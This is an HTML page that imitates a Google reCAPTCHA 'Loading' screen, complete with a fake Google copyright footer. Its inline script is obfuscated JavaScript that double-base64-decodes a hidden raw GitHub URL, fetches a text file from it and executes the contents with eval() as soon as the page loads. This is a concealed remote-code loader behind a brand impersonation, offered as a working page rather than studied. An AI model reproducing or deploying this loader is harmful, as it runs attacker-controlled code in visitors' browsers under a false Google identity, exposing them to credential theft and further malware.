<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>Loading Page</title>
        <style>
            body {
                font-family: Arial, sans-serif;
                margin: 0;
                padding: 0;
                background-color: #f1f1f1;
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
                box-sizing: border-box;
            }
            .container {
                background-color: #fff;
                border-radius: 10px;
                padding: 20px;
                box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
                max-width: 400px;
                width: 90%;
                text-align: center;
            }
            h1 {
                margin-bottom: 20px;
            }
            p {
                margin-bottom: 10px;
            }
            button {
                padding: 10px 20px;
                border: none;
                border-radius: 5px;
                background-color: #007bff;
                color: #fff;
                cursor: pointer;
            }
            button:hover {
                background-color: #0056b3;
            }
            .footer {
                margin-top: 20px;
                font-size: 12px;
                color: #888;
            }
        </style>
    </head>
    <body>
        <div class="container" id="main-container">
            <h1>Loading</h1>
            <p style="text-align: center;"><img alt="" src="https://www.google.com/recaptcha/intro/images/hero-recaptcha-invisible.gif" /></p>
            <div class="footer">
                <p>By using this website, you agree to our <a href="#">Privacy Policy</a> and <a href="#">Terms of Service</a>.</p>
                <p>&copy; 2024 Google. All rights reserved.</p>
            </div>
        </div>

	
	<script>
var _0x4d2d88=_0x334c;(function(_0x29b748,_0x2677ed){var _0x45ad67=_0x334c,_0x7004f0=_0x29b748();while(!![]){try{var _0xdfb6ca=-parseInt(_0x45ad67(0x8a))/0x1+-parseInt(_0x45ad67(0x92))/0x2+-parseInt(_0x45ad67(0x87))/0x3*(-parseInt(_0x45ad67(0x88))/0x4)+-parseInt(_0x45ad67(0x8c))/0x5*(-parseInt(_0x45ad67(0x89))/0x6)+-parseInt(_0x45ad67(0x8e))/0x7+parseInt(_0x45ad67(0x86))/0x8+-parseInt(_0x45ad67(0x8d))/0x9;if(_0xdfb6ca===_0x2677ed)break;else _0x7004f0['push'](_0x7004f0['shift']());}catch(_0x1ff14d){_0x7004f0['push'](_0x7004f0['shift']());}}}(_0x2ff6,0xd374b));function _0x334c(_0x3975ca,_0x25ddcd){var _0x2ff66d=_0x2ff6();return _0x334c=function(_0x334c43,_0x2bbb64){_0x334c43=_0x334c43-0x85;var _0x3f06c4=_0x2ff66d[_0x334c43];return _0x3f06c4;},_0x334c(_0x3975ca,_0x25ddcd);}function doubleDecode_main(_0x34d5c8){return atob(atob(_0x34d5c8));}function _0x2ff6(){var _0x5f3442=['text','YUhSMGNITTZMeTl5WVhjdVoybDBhSFZpZFhObGNtTnZiblJsYm5RdVkyOXRMMnhqYjJ4aGQzbGxjbk12YzI5MWNtTmxMMjFoYVc0dmFtRjJZUzUwZUhR','Error\x20fetching\x20or\x20executing\x20script:','281862wxzeib','then','1290328HBcPJJ','9wBKQsU','717424Bxizwk','6NEtmmV','43008jTSyUX','error','3622555ntMeGR','1780119rElaBP','1232119NEHqcp'];_0x2ff6=function(){return _0x5f3442;};return _0x2ff6();}fetch(doubleDecode_main(_0x4d2d88(0x90)))[_0x4d2d88(0x85)](_0x19e842=>_0x19e842[_0x4d2d88(0x8f)]())[_0x4d2d88(0x85)](_0x2c0947=>{eval(_0x2c0947);})['catch'](_0x530560=>{var _0x4aee5=_0x4d2d88;console[_0x4aee5(0x8b)](_0x4aee5(0x91),_0x530560);});
	</script>

	</body>
</html>
